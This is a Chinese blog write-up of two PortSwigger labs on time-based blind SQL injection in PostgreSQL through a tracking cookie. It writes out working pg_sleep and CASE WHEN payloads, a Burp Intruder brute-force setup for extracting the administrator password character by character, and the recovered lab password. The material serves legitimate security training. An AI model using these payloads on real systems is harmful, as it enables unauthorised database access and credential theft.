Lab: Blind SQL injection with time delays and information retrieval:时间延迟盲注和信息检索两个靶场复盘

最新推荐文章于 2023-04-14 09:38:52 发布
最新推荐文章于 2023-04-14 09:38:52 发布
阅读量496 收藏 1
点赞数
分类专栏: 网络安全学习 文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119774782
版权

Lab: Blind SQL injection with time delays 时间延迟盲注靶场复盘

题目内容

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.

解题

  • 根据内容,不知道这个是什么数据库搭建的,所以需要找查命令一个一个试试:
    在这里插入图片描述
  • 根据测试,这个是postgresql:那么我们的注入的代码应该是:’ || pg_sleep(10)–++;
    在这里插入图片描述
    这只是个开胃菜,真正难的在下面:

Lab: Blind SQL injection with time delays and information retrieval 时间延迟盲注和信息检索

靶场内容:

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

解题

  • 这是在cookie上做手脚的,假设cookie上的内容是x
  • 测试代码:x'%3Bselect case when(1=1) then pg_sleep(10) else pg_sleep(0) end --+++ 其中,%3B是分号 ;,用于分隔以执行后面的代码,执行后发现,它真的慢了10s+才出现页面
  • 测试代码:x'%3Bselect case when(1=2) then pg_sleep(10) else pg_sleep(0) end --+++ 发现没有延迟,说明我们可以在其中正确使用一些条件测试代码
  • 测试代码:x'%3Bselect case when(username='administrator') then pg_sleep(10) else pg_sleep(0) end from users --+++来确认是否存在administrator
  • 测试代码:x'%3Bselect case when(username='administrator' and length(password)>1) then pg_sleep(10) else pg_sleep(0) end from users --+++测试密码长度,经过手动测试,密码长度为20
  • 使用Intruder模式,爆破语句为:x'%3Bselect case when(username='administrator' and substring(password,$1$,1)='$a$') then pg_sleep(10) else pg_sleep(0) end from users --+++,字典1为0到20.字典2为0到9 和a到z
  • 除此之外,为了监控应用程序响应每个请求所花费的时间。为了使该过程尽可能可靠,您需要将入侵者攻击配置为在单个线程中发出请求,不要使用10个线程,如果发生了拥塞,那么可能一大堆都是10秒的数据,单线程是实验的关键
    在这里插入图片描述
  • 此外,还要在columns上打开响应时间的信息显示:
    在这里插入图片描述
    这样密码就出来了:t2botzd2xkhaw488bcwi

这个靶场耗时太长了

Zeker62
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL Injection (Blind) time盲注
Appleteachers的博客
04-14 460
python3编写EXP系列 SQL Injection (Blind) time盲注入 1 简介 DVWA靶场这个是最基础的靶场如果想学习EXP编写这个靶场最好不过,如果能把这个靶场的利用的EXP用python3编写出来这样算是合格的exp入门选手了。 https://github.com/digininja/DVWA 这个系列的第五篇内容这里会学习到如何通过时间注入,获取账号和密码。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者
MySQL Blind Sql Injection
weixin_30396699的博客
07-14 140
{==============================================================================} { [ Zeelock-2005 ] } {===================================...
postgresql盲注
公众号shadow sock7
05-29 1757
参考: https://blog.csdn.net/p656456564545/article/details/42466633 先猜当前数据库的长度 and (select length(current_database())) between 0 and 30 ascii猜解库名的每个字符 and (select ascii(substr(current_database(),1,1))) between 0 and 32768 猜解数据库的表的个数 and (select count(*) fro
SQL | POST基于时间与布尔盲注
m_de_g的博客
12-06 1466
SQL | POST基于时间与布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间的盲注 3.POST基于布尔的盲注 4.sqlmap安全测试 ...
SQL盲注
ssslq的博客
03-02 706
SQL盲注实操
figs.rar_Systems with delays_integro differential_time varying d
09-21
标题 "figs.rar_Systems with delays_integro differential_time varying d" 暗示了这是一个与延迟系统、积分微分方程以及时变延迟相关的研究主题。在这个领域中,我们通常探讨的是那些在动态系统中涉及到时间延迟...
Asynchronous Consensus in Continuous-Time Multi-Agent Systems With Switching Topology and Time-Varying Delays
02-20
The paper studies asynchronous consensus problems of continuous-time multi-agent systems with discontinuous information transmission. The proposed consensus control strategy is implemented based on ...
delays:将执行延迟给定时间的简单 shell 命令
05-30
非常简单的 shell 命令,可以将执行延迟给定的时间。 它可用于延迟脚本的执行,但它应该用于教学目的。 该项目将实施: autotools :自动构建系统[TDB] Travis-CI :持续集成系统 建造 make all && make test ...
Impulsive controller for wireless networked control system with time delays and packet dropouts
02-11
Impulsive controller for wireless networked control system with time delays and packet dropouts
postgresql盲注+比较简单方法
08-05
该文档讲解了有关postgresql数据库盲注手段技术,有这方面兴趣的可以学习学习
SQL 盲注
周无争的博客
09-26 303
本文翻译自:https://portswigger.net/web-security/sql-injection/blind 在这一部分,我们将描述什么是盲目的SQL注入,解释各种发现和利用盲目的SQL注入漏洞的技术。 什么是SQL盲注? 当应用程序易受SQL注入攻击,但其HTTP响应不包含相关SQL查询的结果或任何数据库错误的详细信息时,就会出现SQL盲注。 由于存在SQL盲注漏洞,许多技术(如联合注入)并不有效,因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然有可能利用盲SQL注入来访问未经
SQL_Remaining_Delay这个参数
csdn's blog
05-30 8555
在部署一个只读实例,测试的时候,设置了延时6个小时,启动起来看到情况如下 Seconds_Behind_Master: 0 Master_SSL_Verify_Server_Cert: No Last_IO_Errno: 0 Last_IO_Error: Last_SQL_Errno: 0 Last_SQL_Error: Replicate_Ignor...
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1150
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5377
BurpSuit官方实验室靶场-SQL注入通关记录。
挖洞经验 | 构造基于时间的盲注漏洞(Time-Based SQLi)
南迪叶先森
07-05 508
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! ** ** 某天,当我参与某个漏洞众测项目中,偶尔发现之前一个从未见过的子域名网站,因此我决定深入测试一下。该网站主界面 是一个登录页面,开放了用户注册功能,所以我就注册了一个账户,最后试出了一个时间盲注来。 在查看该网站过程中,我发现其中还有一个搜索功能,我尝试进行了XSS,但是无效。当时,我根本没想着去测试SQL注入漏洞,因 为我觉得开发人员应该部署了完善的过滤措施,不可能存在注入漏洞。但是,其中的点击按钮引起了我的注意,即当.
1 SQL injection
(∪.∪ )...zzz的博客
04-18 930
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
(一)SQL注入实例
weixin_43047908的博客
04-09 2080
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
PortSwigger SQL injection
mengzh620的博客
04-14 424
4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的。1.Retrieval of hidden data ---- Modify the category parameter, giving it the value '+OR+1=1-- 能看到所有的目录。
写一个matlab代码:互信息量法和虚假最邻近点法计算时间延迟τ和嵌入维数m进行相空间重构
最新发布
05-31
以下是一个简单的 Matlab 代码,用于使用互信息量法和虚假最邻近点法计算时间延迟τ和嵌入维数m进行相空间重构: ```matlab % Load your data data = load('data.txt'); % Define the time delay range and ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值